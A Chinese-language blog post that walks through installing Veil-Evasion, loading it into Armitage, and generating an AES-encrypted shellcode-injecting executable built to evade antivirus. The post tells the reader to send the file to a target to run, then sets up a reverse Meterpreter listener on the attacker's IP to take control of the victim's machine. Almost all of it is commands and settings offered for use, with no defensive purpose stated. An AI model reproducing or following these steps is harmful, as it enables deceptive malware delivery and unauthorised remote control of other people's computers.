版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396397
armitage官网:http://www.fastandeasyhacking.com/
https://www.youtube.com/watch?v=IiOlrShWF44
https://www.youtube.com/watch?v=x50blh_G5zA(安装讲解)
cd /tmp
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion
cd setup
bash setup.sh
Y
bash setup.sh -c
然后就是各种默认安装了。
cd ..
python Veil-Evasion.py
postgresql start
armitage
点击armitage,script,load
Veil-Evasion/tools/cortana/veil_evasion.cna
Veil-Evasion,set Veil-Evasion path
把Veil-Evasion.py的绝对路径粘贴上
Veil-Evasion,Generate
outputbase 起个英文名字,payload默认名字
LHOSTS 你的IP
payload看心情选
这里选35试试,python/shellcode_inject/aes_encrypt
勾选overwrit payloads
点generate
复制output的路径,看一下生成的exe,发给目标执行
一般是在/user下的
armitage,listeners,reverse
端口随意
type选meterpreter
然后armitage,listeners,set LHOST 你的IP
有个奇葩的问题,对方执行一次你生成的那个exe,你这里就可以建立一个会话,也就是说,同一个主机,他多开几次你给的exe文件,你这就显示上线了一个主机,但建立了很多会话连接,要疯。